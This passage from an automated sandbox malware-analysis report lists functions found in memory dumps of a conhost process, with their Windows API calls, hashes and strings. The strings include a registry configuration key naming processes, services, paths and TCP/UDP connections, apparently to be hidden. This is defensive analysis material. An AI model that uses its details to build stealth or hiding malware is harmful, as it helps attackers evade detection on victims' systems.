Part of subcall function 0000013F08E61A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000013F08E61A74
Part of subcall function 0000013F08E61A30: PathFindFileNameW.SHLWAPI ref: 0000013F08E61A83
Part of subcall function 0000013F08E61A30: lstrlenW.KERNEL32 ref: 0000013F08E61A8F
Part of subcall function 0000013F08E61A30: StrCpyW.SHLWAPI ref: 0000013F08E61AA2
Part of subcall function 0000013F08E61A30: CloseHandle.KERNEL32 ref: 0000013F08E61AB0

GetProcAddress.KERNEL32 ref: 0000013F08E630A9

Part of subcall function 0000013F08E63F88: StrCmpNIW.SHLWAPI(?,?,?,0000013F08E6272F), ref: 0000013F08E63FA0

StrCmpNIW.SHLWAPI ref: 0000013F08E630EC
lstrlenW.KERNEL32 ref: 0000013F08E63214

Strings

NtQueryObject, xrefs: 0000013F08E6309F
ntdll.dll, xrefs: 0000013F08E6308D
\Device\Nsi, xrefs: 0000013F08E630DF

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: e8e303e550958ede0072480a2d70954000bcae72d0950bddabd175a538577739
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: E1B18C32A1069082EB6D8FA9D4007D9ABA6F744BD4F44502EFE1953B96DF39CE62C341

Function 0000013F08E92FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0000013F08E93094
lstrlenW.KERNEL32 ref: 0000013F08E932BE

Part of subcall function 0000013F08E91A30: OpenProcess.KERNEL32 ref: 0000013F08E91A56
Part of subcall function 0000013F08E91A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000013F08E91A74
Part of subcall function 0000013F08E91A30: PathFindFileNameW.SHLWAPI ref: 0000013F08E91A83
Part of subcall function 0000013F08E91A30: lstrlenW.KERNEL32 ref: 0000013F08E91A8F
Part of subcall function 0000013F08E91A30: StrCpyW.SHLWAPI ref: 0000013F08E91AA2
Part of subcall function 0000013F08E91A30: CloseHandle.KERNEL32 ref: 0000013F08E91AB0

GetProcAddress.KERNEL32 ref: 0000013F08E930A9

Part of subcall function 0000013F08E93F88: StrCmpNIW.SHLWAPI(?,?,?,0000013F08E9272F), ref: 0000013F08E93FA0

StrCmpNIW.SHLWAPI ref: 0000013F08E930EC
lstrlenW.KERNEL32 ref: 0000013F08E93214

Strings

\Device\Nsi, xrefs: 0000013F08E930DF
ntdll.dll, xrefs: 0000013F08E9308D
NtQueryObject, xrefs: 0000013F08E9309F

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: aec2b88a5ada7077f8313227f28c2493905e2e84048d7c9f24cf727acc2c2c9c
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: FAB17131A106D082EB6CCFA9D4407D9ABA6F744B84F54602EFE8953B96DE79CE42C341

Function 0000013F08E684B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000013F08E684CC
RtlCaptureContext.NTDLL ref: 0000013F08E684F9
RtlLookupFunctionEntry.NTDLL ref: 0000013F08E68513
RtlVirtualUnwind.NTDLL ref: 0000013F08E68554
IsDebuggerPresent.KERNEL32 ref: 0000013F08E685A8
SetUnhandledExceptionFilter.KERNEL32 ref: 0000013F08E685C5
UnhandledExceptionFilter.KERNEL32 ref: 0000013F08E685D0

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: f199a5492696f3f30af173293778442318ff1d54c246c6245ac653d34c7f6c1f
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 78317C72604B8086EB648FA4E8403EE7771F784748F44403EEA4E47B9ADF38C649C711

Function 0000013F08E984B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000013F08E984CC
RtlCaptureContext.NTDLL ref: 0000013F08E984F9
RtlLookupFunctionEntry.NTDLL ref: 0000013F08E98513
RtlVirtualUnwind.NTDLL ref: 0000013F08E98554
IsDebuggerPresent.KERNEL32 ref: 0000013F08E985A8
SetUnhandledExceptionFilter.KERNEL32 ref: 0000013F08E985C5
UnhandledExceptionFilter.KERNEL32 ref: 0000013F08E985D0

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 47aab1cb2a5275d92f8107270ce85b9802a1e63dd42dc83262a418a0be7f46e3
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 5B319E76600B8096EB648FA4E8803EE7771F785708F44403EEA4E47BAADF78C249C711

Function 0000013F08E6CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000013F08E6CE0B
RtlLookupFunctionEntry.NTDLL ref: 0000013F08E6CE23
RtlVirtualUnwind.NTDLL ref: 0000013F08E6CE5E
IsDebuggerPresent.KERNEL32 ref: 0000013F08E6CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 0000013F08E6CEA1
UnhandledExceptionFilter.KERNEL32 ref: 0000013F08E6CEAC

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: fa12f00ce2442bcae5fe9ba073c73b183deceb46c41a3ed9b188a915e471b5be
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: AE417F36614B8086E764CF68E8403EE77A5F788794F500129EA9D47B99DF3CC656CB01

Function 0000013F08E9CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000013F08E9CE0B
RtlLookupFunctionEntry.NTDLL ref: 0000013F08E9CE23
RtlVirtualUnwind.NTDLL ref: 0000013F08E9CE5E
IsDebuggerPresent.KERNEL32 ref: 0000013F08E9CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 0000013F08E9CEA1
UnhandledExceptionFilter.KERNEL32 ref: 0000013F08E9CEAC

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: 7fa3b129a1acea8c806d8345e9777e1bc75a2178df947a16c192a3e86d306846
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: F1418036614B8086E764CFA8E8403EE77A5F789754F500129FA8D47B99DF7CC256CB01

Function 0000013F08E6DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 0000013F08E6DB99
FindNextFileW.KERNEL32 ref: 0000013F08E6DCCF
FindClose.KERNEL32 ref: 0000013F08E6DD0F
FindClose.KERNEL32 ref: 0000013F08E6DD3B

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 15896a4928a92b55b576bfecad072520b97665a1541b2fd1fda0909f9c9575d7
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 8CA1D732B0468059FB289BB9DC403ED6FA2E7417D4F944139FA581769BDA3DC653C702

Function 0000013F08E9DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 0000013F08E9DB99
FindNextFileW.KERNEL32 ref: 0000013F08E9DCCF
FindClose.KERNEL32 ref: 0000013F08E9DD0F
FindClose.KERNEL32 ref: 0000013F08E9DD3B

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: d22e4ab0525d5f3cc6e32d82e30bbc556f7826e9f5053c4b301918bce1b768a9
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: CBA1E932B046D059FB289BB99C403ED6F66E741B94F144139FEC82769ADABCC643C701

Function 0000013F08E91724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000013F08E9172F
HeapAlloc.KERNEL32 ref: 0000013F08E9173E

Part of subcall function 0000013F08E91264: GetProcessHeap.KERNEL32 ref: 0000013F08E9126A
Part of subcall function 0000013F08E91264: HeapAlloc.KERNEL32 ref: 0000013F08E91279
Part of subcall function 0000013F08E91264: GetProcessHeap.KERNEL32 ref: 0000013F08E91293
Part of subcall function 0000013F08E91264: HeapAlloc.KERNEL32 ref: 0000013F08E912A4

Part of subcall function 0000013F08E91000: GetProcessHeap.KERNEL32 ref: 0000013F08E91006
Part of subcall function 0000013F08E91000: HeapAlloc.KERNEL32 ref: 0000013F08E91015
Part of subcall function 0000013F08E91000: GetProcessHeap.KERNEL32 ref: 0000013F08E91028
Part of subcall function 0000013F08E91000: HeapAlloc.KERNEL32 ref: 0000013F08E91037

RegOpenKeyExW.ADVAPI32 ref: 0000013F08E917AE
RegOpenKeyExW.ADVAPI32 ref: 0000013F08E917DB
RegCloseKey.ADVAPI32 ref: 0000013F08E917F5
RegOpenKeyExW.ADVAPI32 ref: 0000013F08E91815
RegCloseKey.ADVAPI32 ref: 0000013F08E91830
RegOpenKeyExW.ADVAPI32 ref: 0000013F08E91850
RegCloseKey.ADVAPI32 ref: 0000013F08E9186B
RegOpenKeyExW.ADVAPI32 ref: 0000013F08E9188B
RegCloseKey.ADVAPI32 ref: 0000013F08E918A6
RegOpenKeyExW.ADVAPI32 ref: 0000013F08E918C6
RegCloseKey.ADVAPI32 ref: 0000013F08E918E1
RegOpenKeyExW.ADVAPI32 ref: 0000013F08E91901
RegCloseKey.ADVAPI32 ref: 0000013F08E9191C
RegOpenKeyExW.ADVAPI32 ref: 0000013F08E9193C
RegCloseKey.ADVAPI32 ref: 0000013F08E91957
RegOpenKeyExW.ADVAPI32 ref: 0000013F08E91977
RegCloseKey.ADVAPI32 ref: 0000013F08E91992
RegCloseKey.ADVAPI32 ref: 0000013F08E9199C

Part of subcall function 0000013F08E912B8: RegQueryInfoKeyW.ADVAPI32 ref: 0000013F08E91315
Part of subcall function 0000013F08E912B8: GetProcessHeap.KERNEL32 ref: 0000013F08E91323
Part of subcall function 0000013F08E912B8: HeapAlloc.KERNEL32 ref: 0000013F08E91334
Part of subcall function 0000013F08E912B8: RegEnumValueW.ADVAPI32 ref: 0000013F08E91393
Part of subcall function 0000013F08E912B8: GetProcessHeap.KERNEL32 ref: 0000013F08E913DB
Part of subcall function 0000013F08E912B8: HeapAlloc.KERNEL32 ref: 0000013F08E913E9
Part of subcall function 0000013F08E912B8: GetProcessHeap.KERNEL32 ref: 0000013F08E91406
Part of subcall function 0000013F08E912B8: HeapFree.KERNEL32 ref: 0000013F08E91414
Part of subcall function 0000013F08E912B8: lstrlenW.KERNEL32 ref: 0000013F08E9141D
Part of subcall function 0000013F08E912B8: GetProcessHeap.KERNEL32 ref: 0000013F08E9142B
Part of subcall function 0000013F08E912B8: HeapAlloc.KERNEL32 ref: 0000013F08E91439

Strings

process_names, xrefs: 0000013F08E91849
SOFTWARE\$rbx-config, xrefs: 0000013F08E9178E
tcp_remote, xrefs: 0000013F08E91935
service_names, xrefs: 0000013F08E918BF
paths, xrefs: 0000013F08E91884
udp, xrefs: 0000013F08E91970
tcp_local, xrefs: 0000013F08E918FA
startup, xrefs: 0000013F08E917D1
pid, xrefs: 0000013F08E9180E

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 19b9363ba9b117aadc5f38c5d88331c09bf7ca28a0eabb84dc0f2f8e1d23a03c
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: F1715C36B10B41C5EB149FA9E8906D97BA6FB85F88F411129ED8D43B2ADF3CC646C341

Function 0000013F08E612B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000013F08E61315
GetProcessHeap.KERNEL32 ref: 0000013F08E61323
HeapAlloc.KERNEL32 ref: 0000013F08E61334
RegEnumValueW.ADVAPI32 ref: 0000013F08E61393

Part of subcall function 0000013F08E61530: StrCmpIW.SHLWAPI ref: 0000013F08E61561

GetProcessHeap.KERNEL32 ref: 0000013F08E613DB
HeapAlloc.KERNEL32 ref: 0000013F08E613E9
GetProcessHeap.KERNEL32 ref: 0000013F08E61406
HeapFree.KERNEL32 ref: 0000013F08E61414
lstrlenW.KERNEL32 ref: 0000013F08E6141D
GetProcessHeap.KERNEL32 ref: 0000013F08E6142B
HeapAlloc.KERNEL32 ref: 0000013F08E61439
StrCpyW.SHLWAPI ref: 0000013F08E6145B
GetProcessHeap.KERNEL32 ref: 0000013F08E61472
HeapFree.KERNEL32 ref: 0000013F08E61480

Strings

d, xrefs: 0000013F08E61356

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 397b987050f128e22d830f72e8a7bb01dca0d2bfe38299e200fb8c4775a4ba57
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 16514D32A10B84D6E729CFA6E44839A7BA2F788FD9F444128EE4907719DF3CC156C741

Function 0000013F08E912B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000013F08E91315
GetProcessHeap.KERNEL32 ref: 0000013F08E91323
HeapAlloc.KERNEL32 ref: 0000013F08E91334
RegEnumValueW.ADVAPI32 ref: 0000013F08E91393

Part of subcall function 0000013F08E91530: StrCmpIW.SHLWAPI ref: 0000013F08E91561

GetProcessHeap.KERNEL32 ref: 0000013F08E913DB
HeapAlloc.KERNEL32 ref: 0000013F08E913E9
GetProcessHeap.KERNEL32 ref: 0000013F08E91406
HeapFree.KERNEL32 ref: 0000013F08E91414
lstrlenW.KERNEL32 ref: 0000013F08E9141D
GetProcessHeap.KERNEL32 ref: 0000013F08E9142B
HeapAlloc.KERNEL32 ref: 0000013F08E91439
StrCpyW.SHLWAPI ref: 0000013F08E9145B
GetProcessHeap.KERNEL32 ref: 0000013F08E91472
HeapFree.KERNEL32 ref: 0000013F08E91480

Strings

d, xrefs: 0000013F08E91356

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 9282f11b0117bad9048345d3caad1c347c3cde219da35e19cb7aa77bd5b0f26d
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: C2513E32A10B84D6E718CFA6E4443AABBA2F788F98F444128EE4907759DF7CD146C701

Function 0000013F08E6EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,0000013F08E6F34A,?,?,00000000,0000013F08E6F2CD), ref: 0000013F08E6EFF5
GetLastError.KERNEL32(?,?,00000000,0000013F08E6F2CD), ref: 0000013F08E6F007
LoadLibraryExW.KERNEL32(?,?,00000000,0000013F08E6F2CD), ref: 0000013F08E6F049
VirtualProtect.KERNEL32 ref: 0000013F08E6F0A5
VirtualProtect.KERNEL32 ref: 0000013F08E6F0D6
FreeLibrary.KERNEL32(?,?,00000000,0000013F08E6F2CD), ref: 0000013F08E6F11A
GetProcAddress.KERNEL32(?,?,00000000,0000013F08E6F2CD), ref: 0000013F08E6F126

Strings

AppPolicyGetProcessTerminationMethod, xrefs: 0000013F08E6F157, 0000013F08E6F165
ext-ms-, xrefs: 0000013F08E6F02E
api-ms-, xrefs: 0000013F08E6F01B

Memory Dump Source

Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true

Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 92b49dc96b5131c409916216ad549a41d4becdc0c72b5188b1cc2d28516873ec
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: AF518031B0174491EA689B9AE8003E93A52BB49BF0F580739EE3D473D2DF3CD6578642

Function 0000013F08E9EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,0000013F08E9F34A,?,?,00000000,0000013F08E9F2CD), ref: 0000013F08E9EFF5
GetLastError.KERNEL32(?,?,00000000,0000013F08E9F2CD), ref: 0000013F08E9F007
LoadLibraryExW.KERNEL32(?,?,00000000,0000013F08E9F2CD), ref: 0000013F08E9F049
VirtualProtect.KERNEL32 ref: 0000013F08E9F0A5
VirtualProtect.KERNEL32 ref: 0000013F08E9F0D6
FreeLibrary.KERNEL32(?,?,00000000,0000013F08E9F2CD), ref: 0000013F08E9F11A
GetProcAddress.KERNEL32(?,?,00000000,0000013F08E9F2CD), ref: 0000013F08E9F126

Strings

AppPolicyGetProcessTerminationMethod, xrefs: 0000013F08E9F157, 0000013F08E9F165
ext-ms-, xrefs: 0000013F08E9F02E
api-ms-, xrefs: 0000013F08E9F01B

Memory Dump Source

Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true

Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
